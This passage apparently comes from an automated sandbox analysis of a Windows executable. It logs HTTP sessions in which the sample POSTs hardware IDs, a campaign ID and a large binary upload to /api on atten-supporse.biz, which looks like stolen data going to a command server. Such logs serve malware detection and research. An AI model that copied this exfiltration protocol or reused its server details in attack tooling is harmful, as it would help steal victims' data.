                                                                        Data Ascii: cphJT5syMCdZxyfOsnVEVJIkPXHByWFuo4mX9wvRZcwvyl0A3HE4PhCTav28YFVR1B8hctHEbWfpldjkQtFhi3SYG0GVdS9/Qd9O/6drRBfPWzIy0M4sOqOS0+FP0WWKcoxWDtpzNzAdlG7+tGhRWtQHIXnYzmVu7taXrkzOKdQ3u1YB23UhfwbRfriyaRQPkBQnfdTNb2HinMv8R99hiXuBVQnHdDg2Gpxu/71pXlTXVWUy0NosOqO1zv5Glnb
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 51 62 54 64 54 45 78 43 35 70 68 39 37 70 73 58 56 50 59 46 69 74 32 30 38 56 70 59 65 2b 64 33 75 31 45 30 6d 43 43 66 6f 55 62 51 5a 56 31 4c 33 39 42 33 30 62 6a 74 6d 6c 5a 46 38 39 62 4d 6a 4c 51 7a 69 77 36 6f 35 72 58 36 30 76 63 62 34 68 79 6a 46 45 4b 31 58 6b 30 4d 42 32 5a 59 2f 65 31 62 6c 31 57 31 68 41 68 65 64 48 50 62 32 54 6c 31 70 65 75 54 4d 34 70 31 44 65 71 51 41 4c 5a 64 58 63 67 56 34 59 6e 2f 37 6b 6c 44 42 66 62 47 53 39 31 31 38 39 76 61 75 61 53 30 2b 74 4c 33 6e 75 45 64 34 31 4a 48 64 56 37 4d 6a 4d 61 6e 32 50 2b 76 47 4e 58 55 35 42 62 61 33 58 50 67 6a 51 69 7a 70 72 65 78 30 7a 4e 4b 5a 4d 35 6b 78 73 49 32 54 4a 76 66 78 69 55 62 66 65 34 5a 6c 4a 55 32 78 41 68 63 39 44 4b 59 58 44 67 6d 64 62 71 53 39 6c 76 69 6e 61 46
                                                                        Data Ascii: QbTdTExC5ph97psXVPYFit208VpYe+d3u1E0mCCfoUbQZV1L39B30bjtmlZF89bMjLQziw6o5rX60vcb4hyjFEK1Xk0MB2ZY/e1bl1W1hAhedHPb2Tl1peuTM4p1DeqQALZdXcgV4Yn/7klDBfbGS91189vauaS0+tL3nuEd41JHdV7MjMan2P+vGNXU5Bba3XPgjQizprex0zNKZM5kxsI2TJvfxiUbfe4ZlJU2xAhc9DKYXDgmdbqS9lvinaF
                                                                        2024-11-30 21:30:29 UTC387INData Raw: 51 30 4b 52 72 59 57 63 61 53 63 31 35 51 77 42 49 38 66 5a 65 4d 4c 47 32 6a 7a 75 43 75 51 74 46 79 6e 57 47 48 53 77 69 56 54 58 6c 2f 41 64 38 2f 75 49 42 6d 57 6c 6e 58 41 7a 6f 2f 38 4e 52 6d 5a 66 4f 52 7a 75 45 4c 6d 43 6d 4b 4e 39 49 49 51 5a 56 32 4a 6e 39 42 7a 7a 57 6a 34 44 59 44 42 34 49 4b 5a 57 75 58 31 43 77 36 73 64 69 5a 2f 41 75 4f 4b 63 74 30 6d 45 6b 4a 31 6d 51 30 65 43 65 68 51 4f 4b 34 59 30 4e 47 37 69 73 73 61 4e 72 45 65 33 4f 76 67 39 72 67 52 64 46 2f 7a 44 6e 4b 56 45 2b 4e 53 33 64 33 57 61 41 70 75 4b 30 6c 44 42 66 6c 46 69 56 38 30 4e 52 39 4c 38 53 4d 31 4f 68 63 78 79 6e 43 4e 34 77 62 56 34 55 38 64 7a 73 49 33 7a 2b 6f 35 7a 34 42 42 49 64 46 65 57 32 5a 32 79 78 30 6f 38 36 4c 6f 41 76 45 4b 64 51 33 7a 56 67 64 78
                                                                        Data Ascii: Q0KRrYWcaSc15QwBI8fZeMLG2jzuCuQtFynWGHSwiVTXl/Ad8/uIBmWlnXAzo/8NRmZfORzuELmCmKN9IIQZV2Jn9BzzWj4DYDB4IKZWuX1Cw6sdiZ/AuOKct0mEkJ1mQ0eCehQOK4Y0NG7issaNrEe3Ovg9rgRdF/zDnKVE+NS3d3WaApuK0lDBflFiV80NR9L8SM1OhcxynCN4wbV4U8dzsI3z+o5z4BBIdFeW2Z2yx0o86LoAvEKdQ3zVgdx
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 32 36 66 35 0d 0a 77 41 53 65 63 63 66 57 36 62 6c 56 70 37 6a 73 6d 63 39 54 4d 4c 6c 50 31 6d 38 6e 74 54 74 46 58 73 6e 6d 4e 54 77 6a 62 64 44 64 2f 56 39 39 6f 75 4f 31 63 46 42 2b 51 4b 6d 55 79 7a 34 49 30 49 74 61 56 31 2b 42 4d 77 48 6a 42 56 4a 78 57 41 4e 35 7a 64 33 46 5a 6d 53 65 67 35 53 73 55 55 38 46 56 63 79 4b 46 6d 54 6b 78 74 4d 61 4c 38 51 58 50 4b 5a 6f 33 30 67 6c 42 6c 57 42 33 5a 31 6e 59 61 66 57 30 5a 6c 70 55 77 67 63 74 63 63 48 42 4b 31 7a 64 74 39 54 6c 52 39 74 6d 68 30 6d 30 65 67 4c 65 66 6a 6f 77 45 71 46 5a 37 62 5a 72 57 6c 44 47 42 47 73 38 6c 38 30 73 4f 74 72 57 6b 61 35 30 6d 43 6d 55 4e 39 49 62 4f 74 5a 38 4f 54 67 50 6a 69 72 5a 75 47 35 59 57 74 38 65 61 7a 79 58 78 43 77 36 73 39 69 5a 36 6c 71 57 4d 64 77 6c
                                                                        Data Ascii: 26f5wASeccfW6blVp7jsmc9TMLlP1m8ntTtFXsnmNTwjbdDd/V99ouO1cFB+QKmUyz4I0ItaV1+BMwHjBVJxWAN5zd3FZmSeg5SsUU8FVcyKFmTkxtMaL8QXPKZo30glBlWB3Z1nYafW0ZlpUwgctccHBK1zdt9TlR9tmh0m0egLefjowEqFZ7bZrWlDGBGs8l80sOtrWka50mCmUN9IbOtZ8OTgPjirZuG5YWt8eazyXxCw6s9iZ6lqWMdwl
                                                                        2024-11-30 21:30:29 UTC1369INData Raw: 74 5a 4f 7a 6b 65 68 57 44 2b 6b 30 55 55 47 5a 41 61 61 79 72 75 67 69 51 69 33 4e 69 5a 39 67 75 4f 4b 62 6c 30 68 46 55 49 77 32 4e 36 47 67 36 63 64 2f 36 32 4a 52 6f 58 31 6c 56 7a 49 70 6d 43 61 48 4f 6a 7a 6f 6d 38 45 49 4d 36 32 79 66 59 52 45 48 4d 4d 69 46 2f 51 63 30 70 75 4b 63 6c 44 42 65 58 46 6a 6c 67 30 63 46 36 59 61 53 6f 35 38 68 49 78 32 4f 74 65 70 70 63 4d 65 74 6e 4e 44 45 58 6d 48 48 70 39 53 73 55 57 4a 42 4e 45 6a 4b 66 6a 6d 70 68 39 64 62 6d 6f 41 76 4f 4b 64 51 33 76 31 67 42 32 33 55 68 4c 6c 53 35 5a 4f 6d 2f 52 46 6c 48 31 31 56 6c 4d 74 47 43 4e 44 47 74 31 74 33 2f 43 34 34 35 33 69 7a 66 43 46 69 46 49 43 68 78 41 4e 39 78 75 4f 30 33 47 68 66 43 56 58 4d 79 6b 4d 46 2b 63 4f 57 56 7a 2b 30 4d 36 46 65 35 64 49 52 56 43
                                                                        Data Ascii: tZOzkehWD+k0UUGZAaayrugiQi3NiZ9guOKbl0hFUIw2N6Gg6cd/62JRoX1lVzIpmCaHOjzom8EIM62yfYREHMMiF/Qc0puKclDBeXFjlg0cF6YaSo58hIx2OteppcMetnNDEXmHHp9SsUWJBNEjKfjmph9dbmoAvOKdQ3v1gB23UhLlS5ZOm/RFlH11VlMtGCNDGt1t3/C4453izfCFiFIChxAN9xuO03GhfCVXMykMF+cOWVz+0M6Fe5dIRVC


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.849708172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:31 UTC283OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=D8IQA5B28O6DU5J3C
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 12842
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:31 UTC12842OUTData Raw: 2d 2d 44 38 49 51 41 35 42 32 38 4f 36 44 55 35 4a 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32 0d 0a 2d 2d 44 38 49 51 41 35 42 32 38 4f 36 44 55 35 4a 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 38 49 51 41 35 42 32 38 4f 36 44 55 35 4a 33 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d
                                                                        Data Ascii: --D8IQA5B28O6DU5J3CContent-Disposition: form-data; name="hwid"AD934E66B434D7199849029CA6327E02--D8IQA5B28O6DU5J3CContent-Disposition: form-data; name="pid"2--D8IQA5B28O6DU5J3CContent-Disposition: form-data; name="lid"BVnUqo--@distez
                                                                        2024-11-30 21:30:32 UTC1022INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=cd47i8m802cjfrvfe4nm5p1jrj; expires=Wed, 26-Mar-2025 15:17:10 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jz9RNkAGJ1eQb%2FdNRS%2FjNDjLFtUwgI1fec9DdGLtLSjw2xemmYETPtuVo6ih7pIXNEU3EjR0NLWv3531%2Fba0OFTo9f1nUhKti%2F9t8C2IjTY96qBN2Z7npgHtncyAibCHeqPSK5w%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf06a3ae34255-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1745&min_rtt=1740&rtt_var=662&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13783&delivery_rate=1640449&cwnd=225&unsent_bytes=0&cid=b938d14b5d26a1e2&ts=1143&x=0"
                                                                        2024-11-30 21:30:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                        Data Ascii: fok 8.46.123.228
                                                                        2024-11-30 21:30:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.849709172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:33 UTC276OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=6YKN7TOC71
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 15029
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:33 UTC15029OUTData Raw: 2d 2d 36 59 4b 4e 37 54 4f 43 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32 0d 0a 2d 2d 36 59 4b 4e 37 54 4f 43 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 59 4b 4e 37 54 4f 43 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 36 59 4b 4e 37 54 4f 43 37 31 0d 0a 43 6f 6e 74 65 6e
                                                                        Data Ascii: --6YKN7TOC71Content-Disposition: form-data; name="hwid"AD934E66B434D7199849029CA6327E02--6YKN7TOC71Content-Disposition: form-data; name="pid"2--6YKN7TOC71Content-Disposition: form-data; name="lid"BVnUqo--@distez--6YKN7TOC71Conten
                                                                        2024-11-30 21:30:34 UTC1024INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=0ijg1f7ldeo6q627ik435sejhg; expires=Wed, 26-Mar-2025 15:17:13 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSi0yfhj67ssvz%2B1JqmW%2BcBCkduZMVxmtx9sTyNutyBl8FOENn%2BHYInWpLDcrNMP2scvuOE814sZJfohfPpj503sh%2BymHWBGYwowBIAzipdPZfPtP8mJ7%2BYoD0rs5StLCJVcb1Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf07aa93e0f60-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3929&min_rtt=1536&rtt_var=2154&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15963&delivery_rate=1901041&cwnd=211&unsent_bytes=0&cid=e6faa65000262627&ts=905&x=0"
                                                                        2024-11-30 21:30:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                        Data Ascii: fok 8.46.123.228
                                                                        2024-11-30 21:30:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.849710172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:36 UTC274OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=URSDWKJY
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 20184
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:36 UTC15331OUTData Raw: 2d 2d 55 52 53 44 57 4b 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32 0d 0a 2d 2d 55 52 53 44 57 4b 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 52 53 44 57 4b 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d 0a 2d 2d 55 52 53 44 57 4b 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                        Data Ascii: --URSDWKJYContent-Disposition: form-data; name="hwid"AD934E66B434D7199849029CA6327E02--URSDWKJYContent-Disposition: form-data; name="pid"3--URSDWKJYContent-Disposition: form-data; name="lid"BVnUqo--@distez--URSDWKJYContent-Dispos
                                                                        2024-11-30 21:30:36 UTC4853OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df 0f 03 00 00 00 00 00 00
                                                                        Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
                                                                        2024-11-30 21:30:37 UTC1022INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=vs5s3ijl2h0oc4q3qjd5t86fq6; expires=Wed, 26-Mar-2025 15:17:16 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsmw6PoYyCvCbMsHCO1wCZs%2BdpocnWIyCtARfNk2os22f9t%2FHMjRIPPjjvEaRRE%2Fq9IX78wDDga5zUydmLL4lMxtPQhtpQ52p6Qecp8qyV%2FeRkziwBrmRPNoqooHXbAJMkNSet8%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf08c2b224378-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1863&min_rtt=1856&rtt_var=710&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21138&delivery_rate=1526398&cwnd=232&unsent_bytes=0&cid=2314deab7c3865aa&ts=1140&x=0"
                                                                        2024-11-30 21:30:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                        Data Ascii: fok 8.46.123.228
                                                                        2024-11-30 21:30:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.849711172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:40 UTC282OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=VNMP0L5TT4ELFIIO3
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 1224
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:40 UTC1224OUTData Raw: 2d 2d 56 4e 4d 50 30 4c 35 54 54 34 45 4c 46 49 49 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32 0d 0a 2d 2d 56 4e 4d 50 30 4c 35 54 54 34 45 4c 46 49 49 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 4e 4d 50 30 4c 35 54 54 34 45 4c 46 49 49 4f 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64 69 73 74 65 7a 0d
                                                                        Data Ascii: --VNMP0L5TT4ELFIIO3Content-Disposition: form-data; name="hwid"AD934E66B434D7199849029CA6327E02--VNMP0L5TT4ELFIIO3Content-Disposition: form-data; name="pid"1--VNMP0L5TT4ELFIIO3Content-Disposition: form-data; name="lid"BVnUqo--@distez
                                                                        2024-11-30 21:30:40 UTC1016INHTTP/1.1 200 OK
                                                                        Date: Sat, 30 Nov 2024 21:30:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=rjnb8kloidksv1qb5mgs4r7m55; expires=Wed, 26-Mar-2025 15:17:19 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFFVHlbWlU4EcmZERoqUqEbXlA1z2O8KTH%2FRRvxKeJTv3%2Fxe4XmheYVqSXzBGIDtDqnqUgRQxFnh2H8YUTZRWClLigotYpUIEV7bsMhrEFoBRVvOnp0F0wNcy%2FHq3yVkPRw6qH0%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8eadf0a18dd2c324-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1510&min_rtt=1498&rtt_var=587&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2142&delivery_rate=1825000&cwnd=162&unsent_bytes=0&cid=5c1263d7bc45e621&ts=875&x=0"
                                                                        2024-11-30 21:30:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                        Data Ascii: fok 8.46.123.228
                                                                        2024-11-30 21:30:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.849714172.67.165.1664437644C:\Users\user\Desktop\fkydjyhjadg.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-30 21:30:43 UTC286OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=ZS7WCONQ6BCRKM9SKA3
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 587900
                                                                        Host: atten-supporse.biz
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 2d 2d 5a 53 37 57 43 4f 4e 51 36 42 43 52 4b 4d 39 53 4b 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 39 33 34 45 36 36 42 34 33 34 44 37 31 39 39 38 34 39 30 32 39 43 41 36 33 32 37 45 30 32 0d 0a 2d 2d 5a 53 37 57 43 4f 4e 51 36 42 43 52 4b 4d 39 53 4b 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 53 37 57 43 4f 4e 51 36 42 43 52 4b 4d 39 53 4b 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 64
                                                                        Data Ascii: --ZS7WCONQ6BCRKM9SKA3Content-Disposition: form-data; name="hwid"AD934E66B434D7199849029CA6327E02--ZS7WCONQ6BCRKM9SKA3Content-Disposition: form-data; name="pid"1--ZS7WCONQ6BCRKM9SKA3Content-Disposition: form-data; name="lid"BVnUqo--@d
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: f8 b9 45 45 b3 4b 49 d9 b7 eb c3 76 59 d0 ed 1d 34 77 25 b8 e9 f5 4a 16 98 c0 63 42 0b 87 81 1e 73 51 a2 12 01 5e c6 88 eb 2d 9d 7b 5e 58 e5 31 63 fa d3 7f e2 af f3 28 a0 b8 58 6b 99 c7 ac 97 a5 8f 56 7e 5c 1a fd 5e 9d fc 5b 28 7c 3f 96 90 1e 71 2c 41 0c c8 33 a0 8c 46 38 fd 9c 33 3d 47 06 a4 d8 e3 01 d9 67 70 94 19 06 d7 66 0d cb c9 af 16 2e 4c 38 b7 6f 7e ef 0f b1 87 c3 b2 da 02 4b 1c b7 13 01 b3 f8 fb ff 2d 4e ff 7f 97 64 40 7b dd f1 7b b5 d2 63 43 4a 1e 8b d7 1f 0a 82 5d 74 bd 7a 03 24 da 33 9e 91 4f f6 da 85 d8 de 47 be bf 37 0a de 21 07 e7 66 d4 21 e0 eb aa 05 52 bc df 9e 5c d9 23 00 e2 86 a7 9f 84 35 91 ce 3d be 37 86 a1 15 00 c4 d9 ed de 26 b8 fb a7 84 17 46 f3 f0 16 ac 6b e1 4c f7 5f c6 ca 06 57 92 93 3e a7 17 b1 33 3b b4 11 6b d2 1e 74 6f e4 2d
                                                                        Data Ascii: EEKIvY4w%JcBsQ^-{^X1c(XkV~\^[(|?q,A3F83=Ggpf.L8o~K-Nd@{{cCJ]tz$3OG7!f!R\#5=7&FkL_W>3;kto-
                                                                        2024-11-30 21:30:43 UTC15331OUTData Raw: 61 b7 25 0f 04 2b 24 ed 23 a1 60 47 bb a1 10 9b 21 c3 83 d9 20 61 1e 0f 34 a6 64 90 de 6a a6 e9 b1 db 36 65 59 94 af 3a 98 9f 6d 94 f9 29 e7 ad 3b b9 2d e1 9e f6 26 91 ce 20 61 69 ac f2 f3 9f a7 7e 1d 4b 10 e8 7a fa 85 7d 24 06 e4 34 08 93 96 3a 3e 5a 59 84 df 7f 33 13 ce 4c 58 76 aa a7 a4 42 ae fc 06 62 38 51 7a ff 0d fb 6a 4b 0c 04 cd ae d6 28 6f 44 1b 1a 5f 3d 28 1a c3 87 c5 b1 ab 07 bd b4 d2 8c 74 64 06 2f 6b bb 5e bd df 3a 5e 53 da d9 50 6f 14 94 a8 cc fb b8 1a 72 41 c4 37 49 5a d9 fa 16 4f ac 6d f3 53 55 76 4d 43 1f c4 22 2c 54 7d 71 37 ae 13 f1 9b 34 a1 32 ac 75 6f ba 0f ba 14 05 8e 3c 79 0e ab cd b8 ac 8d e6 07 7c f9 e9 b7 23 ea 3b 72 b6 d6 4b 6b d8 fb ef ca e5 26 99 e1 3b c1 5b ba be ac 36 6b 79 cc d1 59 49 80 d8 b4 f3 9b bd be b8 aa de ee 6d 4a
